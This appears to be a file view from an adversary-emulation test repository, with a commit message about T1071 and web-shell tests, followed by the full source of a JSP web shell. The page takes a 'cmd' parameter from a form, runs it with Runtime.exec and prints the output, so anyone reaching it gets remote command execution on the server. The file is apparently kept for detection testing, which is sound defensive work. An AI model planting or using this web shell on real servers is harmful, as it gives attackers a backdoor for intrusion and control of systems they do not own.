Michael Haag
0c3e47f7be
* Technique - T1071 First commit of T1071 - Standard Application Layer Protocols. Specifically using powershell & Curl to simulate malicious user agents. * Web Shell Simple test of copying webshells from atomic dir to a path on the file system. * typo * Generate docs from job=validate_atomics_generate_docs branch=web
27 lines
631 B
Plaintext
27 lines
631 B
Plaintext
<%@ page import="java.util.*,java.io.*"%>
|
|
<%
|
|
%>
|
|
<HTML><BODY>
|
|
Commands with JSP
|
|
<FORM METHOD="GET" NAME="myform" ACTION="">
|
|
<INPUT TYPE="text" NAME="cmd">
|
|
<INPUT TYPE="submit" VALUE="Send">
|
|
</FORM>
|
|
<pre>
|
|
<%
|
|
if (request.getParameter("cmd") != null) {
|
|
out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
|
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
|
|
OutputStream os = p.getOutputStream();
|
|
InputStream in = p.getInputStream();
|
|
DataInputStream dis = new DataInputStream(in);
|
|
String disr = dis.readLine();
|
|
while ( disr != null ) {
|
|
out.println(disr);
|
|
disr = dis.readLine();
|
|
}
|
|
}
|
|
%>
|
|
</pre>
|
|
</BODY></HTML>
|